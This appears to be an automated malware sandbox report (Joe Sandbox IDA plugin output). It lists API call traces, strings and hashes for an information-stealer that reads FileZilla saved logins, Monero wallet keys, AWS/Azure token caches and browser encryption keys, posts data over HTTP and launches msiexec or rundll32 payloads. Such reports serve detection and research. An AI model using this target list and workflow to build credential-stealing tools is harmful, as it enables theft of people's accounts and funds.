                                     • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 1942843190-555421843
                                    • Opcode ID: 7bc6dd7eed89821551012c83a93fc9a6c9e09e3cd0b7a46b2db4dc60a48b8555
                                    • Instruction ID: a872fd5da1d9960cef34af9b4b9a39342563533aa81f7a8a09ff70c69d912eb2
                                    • Opcode Fuzzy Hash: 7bc6dd7eed89821551012c83a93fc9a6c9e09e3cd0b7a46b2db4dc60a48b8555
                                    • Instruction Fuzzy Hash: 74D15275900208ABDB04EBF1DD96EEE7738FF94301F444619F502A70A1EF34AA0ACB65
                                    APIs
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                      • Part of subcall function 009447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00944839
                                      • Part of subcall function 009447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00944849
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009459F8
                                    • StrCmpCA.SHLWAPI(?,015EE590), ref: 00945A13
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00945B93
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,015EE550,00000000,?,015E9BA8,00000000,?,00961A1C), ref: 00945E71
                                    • lstrlen.KERNEL32(00000000), ref: 00945E82
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00945E93
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00945E9A
                                    • lstrlen.KERNEL32(00000000), ref: 00945EAF
                                    • lstrlen.KERNEL32(00000000), ref: 00945ED8
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00945EF1
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 00945F1B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00945F2F
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00945F4C
                                    • InternetCloseHandle.WININET(00000000), ref: 00945FB0
                                    • InternetCloseHandle.WININET(00000000), ref: 00945FBD
                                    • HttpOpenRequestA.WININET(00000000,015EE450,?,015ED9E8,00000000,00000000,00400100,00000000), ref: 00945BF8
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                    • InternetCloseHandle.WININET(00000000), ref: 00945FC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                     • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 874700897-2180234286
                                    • Opcode ID: 4cd3a61b367c5da1bb807568873744d634c9549562241dcec5ee6ea87b1e04c9
                                    • Instruction ID: 048bcac0df5493388fe9485db5b00f345c990d8dba033894d924bfe3d27100e7
                                    • Opcode Fuzzy Hash: 4cd3a61b367c5da1bb807568873744d634c9549562241dcec5ee6ea87b1e04c9
                                    • Instruction Fuzzy Hash: 2B12FF71820128ABDB15EBA1DC95FEEB378BF94701F504299B506630A1EF702E4DCF69
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                      • Part of subcall function 00958B60: GetSystemTime.KERNEL32(00960E1A,015E9D28,009605AE,?,?,009413F9,?,0000001A,00960E1A,00000000,?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 00958B86
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0094CF83
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0094D0C7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0094D0CE
                                    • lstrcat.KERNEL32(?,00000000), ref: 0094D208
                                    • lstrcat.KERNEL32(?,00961478), ref: 0094D217
                                    • lstrcat.KERNEL32(?,00000000), ref: 0094D22A
                                    • lstrcat.KERNEL32(?,0096147C), ref: 0094D239
                                    • lstrcat.KERNEL32(?,00000000), ref: 0094D24C
                                    • lstrcat.KERNEL32(?,00961480), ref: 0094D25B
                                    • lstrcat.KERNEL32(?,00000000), ref: 0094D26E
                                    • lstrcat.KERNEL32(?,00961484), ref: 0094D27D
                                    • lstrcat.KERNEL32(?,00000000), ref: 0094D290
                                    • lstrcat.KERNEL32(?,00961488), ref: 0094D29F
                                    • lstrcat.KERNEL32(?,00000000), ref: 0094D2B2
                                    • lstrcat.KERNEL32(?,0096148C), ref: 0094D2C1
                                    • lstrcat.KERNEL32(?,00000000), ref: 0094D2D4
                                    • lstrcat.KERNEL32(?,00961490), ref: 0094D2E3
                                      • Part of subcall function 0095A820: lstrlen.KERNEL32(00944F05,?,?,00944F05,00960DDE), ref: 0095A82B
                                      • Part of subcall function 0095A820: lstrcpy.KERNEL32(00960DDE,00000000), ref: 0095A885
                                    • lstrlen.KERNEL32(?), ref: 0094D32A
                                    • lstrlen.KERNEL32(?), ref: 0094D339
                                      • Part of subcall function 0095AA70: StrCmpCA.SHLWAPI(015E8990,0094A7A7,?,0094A7A7,015E8990), ref: 0095AA8F
                                    • DeleteFileA.KERNEL32(00000000), ref: 0094D3B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                     • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                    • String ID:
                                    • API String ID: 1956182324-0
                                    • Opcode ID: 7d0854b645b764525982c39934be3bb0a36f85e6f9df4779f1d050416b919eba
                                    • Instruction ID: 31a740c02c310905b4dfcdad220967b0947175959273ea8cc0882a06294be52f
                                    • Opcode Fuzzy Hash: 7d0854b645b764525982c39934be3bb0a36f85e6f9df4779f1d050416b919eba
                                    • Instruction Fuzzy Hash: 19E123719101089BDB04EBA1DD96FEE7378BF94302F504259F507B70A1EE35AE09CB6A
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,015ECF48,00000000,?,0096144C,00000000,?,?), ref: 0094CA6C
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0094CA89
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0094CA95
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0094CAA8
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0094CAD9
                                    • StrStrA.SHLWAPI(?,015ECF60,00960B52), ref: 0094CAF7
                                    • StrStrA.SHLWAPI(00000000,015ECF00), ref: 0094CB1E
                                    • StrStrA.SHLWAPI(?,015ED2B8,00000000,?,00961458,00000000,?,00000000,00000000,?,015E88B0,00000000,?,00961454,00000000,?), ref: 0094CCA2
                                    • StrStrA.SHLWAPI(00000000,015ED0D8), ref: 0094CCB9
                                      • Part of subcall function 0094C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0094C871
                                      • Part of subcall function 0094C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0094C87C
                                    • StrStrA.SHLWAPI(?,015ED0D8,00000000,?,0096145C,00000000,?,00000000,015E88D0), ref: 0094CD5A
                                    • StrStrA.SHLWAPI(00000000,015E8AF0), ref: 0094CD71
                                      • Part of subcall function 0094C820: lstrcat.KERNEL32(?,00960B46), ref: 0094C943
                                      • Part of subcall function 0094C820: lstrcat.KERNEL32(?,00960B47), ref: 0094C957
                                      • Part of subcall function 0094C820: lstrcat.KERNEL32(?,00960B4E), ref: 0094C978
                                    • lstrlen.KERNEL32(00000000), ref: 0094CE44
                                    • CloseHandle.KERNEL32(00000000), ref: 0094CE9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                     • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                    • String ID:
                                    • API String ID: 3744635739-3916222277
                                    • Opcode ID: 02d865cdf53dbc48a43fc60ab08636cb0aaabb5dc923d5402d9b62366c38da25
                                    • Instruction ID: 59fa4e30eb71d1cd166ad450cc7420515646e631204b263be09aee6f1847628e
                                    • Opcode Fuzzy Hash: 02d865cdf53dbc48a43fc60ab08636cb0aaabb5dc923d5402d9b62366c38da25
                                    • Instruction Fuzzy Hash: 52E1F071D00108ABDB14EBA5DC95FEEB778BF94301F404259F606671A1EF306A4ECB6A
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    • RegOpenKeyExA.ADVAPI32(00000000,015EABA0,00000000,00020019,00000000,009605B6), ref: 009583A4
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00958426
                                    • wsprintfA.USER32 ref: 00958459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0095847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0095848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00958499
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                     • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                                    • String ID: - $%s\%s$?
                                    • API String ID: 3246050789-3278919252
                                    • Opcode ID: c9babe69753b6e27c41428ba3435d60c6f2f3b1fa019d8badc9e2fbf8e826ee5
                                    • Instruction ID: 2744fe124e270d37e063657b2e615c5a7f725c225c9edf58588da1656cf51d2b
                                    • Opcode Fuzzy Hash: c9babe69753b6e27c41428ba3435d60c6f2f3b1fa019d8badc9e2fbf8e826ee5
                                    • Instruction Fuzzy Hash: 31813D71911118ABEB24DB51CC91FEAB7B8FF48701F008299E609A7190DF746F89CFA5
                                    APIs
                                      • Part of subcall function 00958DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00958E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00954DB0
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 00954DCD
                                      • Part of subcall function 00954910: wsprintfA.USER32 ref: 0095492C
                                      • Part of subcall function 00954910: FindFirstFileA.KERNEL32(?,?), ref: 00954943
                                    • lstrcat.KERNEL32(?,00000000), ref: 00954E3C
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 00954E59
                                      • Part of subcall function 00954910: StrCmpCA.SHLWAPI(?,00960FDC), ref: 00954971
                                      • Part of subcall function 00954910: StrCmpCA.SHLWAPI(?,00960FE0), ref: 00954987
                                      • Part of subcall function 00954910: FindNextFileA.KERNEL32(000000FF,?), ref: 00954B7D
                                      • Part of subcall function 00954910: FindClose.KERNEL32(000000FF), ref: 00954B92
                                    • lstrcat.KERNEL32(?,00000000), ref: 00954EC8
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00954EE5
                                      • Part of subcall function 00954910: wsprintfA.USER32 ref: 009549B0
                                      • Part of subcall function 00954910: StrCmpCA.SHLWAPI(?,009608D2), ref: 009549C5
                                      • Part of subcall function 00954910: wsprintfA.USER32 ref: 009549E2
                                      • Part of subcall function 00954910: PathMatchSpecA.SHLWAPI(?,?), ref: 00954A1E
                                      • Part of subcall function 00954910: lstrcat.KERNEL32(?,015EE4B0), ref: 00954A4A
                                      • Part of subcall function 00954910: lstrcat.KERNEL32(?,00960FF8), ref: 00954A5C
                                      • Part of subcall function 00954910: lstrcat.KERNEL32(?,?), ref: 00954A70
                                      • Part of subcall function 00954910: lstrcat.KERNEL32(?,00960FFC), ref: 00954A82
                                      • Part of subcall function 00954910: lstrcat.KERNEL32(?,?), ref: 00954A96
                                      • Part of subcall function 00954910: CopyFileA.KERNEL32(?,?,00000001), ref: 00954AAC
                                      • Part of subcall function 00954910: DeleteFileA.KERNEL32(?), ref: 00954B31
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 949356159-974132213
                                    • Opcode ID: a5ced6f22c20606167ce38b68b723eb1931b4398672c67c333a7af52a2a3f244
                                    • Instruction ID: 56a7ace6c5d9fb6395015d13a7ea6097949cb050b5d3f90f6f1affec8fb684f6
                                    • Opcode Fuzzy Hash: a5ced6f22c20606167ce38b68b723eb1931b4398672c67c333a7af52a2a3f244
                                    • Instruction Fuzzy Hash: 6641717A94020467DB54F770DC87FEE7238ABA4705F404594B689660C1EEB46BCDCBA2
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0095906C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID: image/jpeg
                                    • API String ID: 2244384528-3785015651
                                    • Opcode ID: 925bfaad52790ed06ab47ecd703d2e859bf255a33d06864cd5714c9e172c287b
                                    • Instruction ID: 7d5833ce48af16c0ebceef6f6fb081fee22556f1b49988e5e931dda299365ff9
                                    • Opcode Fuzzy Hash: 925bfaad52790ed06ab47ecd703d2e859bf255a33d06864cd5714c9e172c287b
                                    • Instruction Fuzzy Hash: 8971CD75910208EBEB04DFE5DC89FEEB7B8BB88701F108509F615AB294DB34A945CB61
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 009531C5
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 0095335D
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 009534EA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell$lstrcpy
                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                    • API String ID: 2507796910-3625054190
                                    • Opcode ID: 0c54e3f62f282bf3fae33eab937bda908aa22bddd216be69ef2463f2d4e0b0ae
                                    • Instruction ID: 8d8e5db2a5fa79e1ca63ae3b287d52dfc3f345774e83ea26b44797736a773deb
                                    • Opcode Fuzzy Hash: 0c54e3f62f282bf3fae33eab937bda908aa22bddd216be69ef2463f2d4e0b0ae
                                    • Instruction Fuzzy Hash: EB120F718001189ADB19EBA1DC92FDEB778AF94301F504259F90676191EF342B4ECFAA
                                    APIs
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                      • Part of subcall function 00946280: InternetOpenA.WININET(00960DFE,00000001,00000000,00000000,00000000), ref: 009462E1
                                      • Part of subcall function 00946280: StrCmpCA.SHLWAPI(?,015EE590), ref: 00946303
                                      • Part of subcall function 00946280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00946335
                                      • Part of subcall function 00946280: HttpOpenRequestA.WININET(00000000,GET,?,015ED9E8,00000000,00000000,00400100,00000000), ref: 00946385
                                      • Part of subcall function 00946280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009463BF
                                      • Part of subcall function 00946280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009463D1
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00955318
                                    • lstrlen.KERNEL32(00000000), ref: 0095532F
                                      • Part of subcall function 00958E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00958E52
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00955364
                                    • lstrlen.KERNEL32(00000000), ref: 00955383
                                    • lstrlen.KERNEL32(00000000), ref: 009553AE
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3240024479-1526165396
                                    • Opcode ID: 89ce8fb429612ff840051366df55e3dac553c73f8e2ac5a2851fdb46c8fee658
                                    • Instruction ID: c2fd135832ac4fc58ba92298854e1fc7e964eb32653ca505c4fe4472a5df291a
                                    • Opcode Fuzzy Hash: 89ce8fb429612ff840051366df55e3dac553c73f8e2ac5a2851fdb46c8fee658
                                    • Instruction Fuzzy Hash: A3510C309101489BDB18FF61CD96BED7779AF90302F504118FD065B5A2EF346B4ACBAA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 7e5c52cbcfd162efc6ee8dbbd8a1267982fdfc504cd124acee93162fc96aa9d8
                                    • Instruction ID: c7e5668dd1d30d56334e18189f219641d3f2e7e37a9e00689970601cb4513d19
                                    • Opcode Fuzzy Hash: 7e5c52cbcfd162efc6ee8dbbd8a1267982fdfc504cd124acee93162fc96aa9d8
                                    • Instruction Fuzzy Hash: 39C1D8B59002099BCB14EF61DC89FEE7378BF94305F004599F90A67291EF70AA89CF95
                                    APIs
                                      • Part of subcall function 00958DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00958E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 009542EC
                                    • lstrcat.KERNEL32(?,015EDE68), ref: 0095430B
                                    • lstrcat.KERNEL32(?,?), ref: 0095431F
                                    • lstrcat.KERNEL32(?,015ECE40), ref: 00954333
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 00958D90: GetFileAttributesA.KERNEL32(00000000,?,00941B54,?,?,0096564C,?,?,00960E1F), ref: 00958D9F
                                      • Part of subcall function 00949CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00949D39
                                      • Part of subcall function 009499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009499EC
                                      • Part of subcall function 009499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00949A11
                                      • Part of subcall function 009499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00949A31
                                      • Part of subcall function 009499C0: ReadFile.KERNEL32(000000FF,?,00000000,0094148F,00000000), ref: 00949A5A
                                      • Part of subcall function 009499C0: LocalFree.KERNEL32(0094148F), ref: 00949A90
                                      • Part of subcall function 009499C0: CloseHandle.KERNEL32(000000FF), ref: 00949A9A
                                      • Part of subcall function 009593C0: GlobalAlloc.KERNEL32(00000000,009543DD,009543DD), ref: 009593D3
                                    • StrStrA.SHLWAPI(?,015EDEB0), ref: 009543F3
                                    • GlobalFree.KERNEL32(?), ref: 00954512
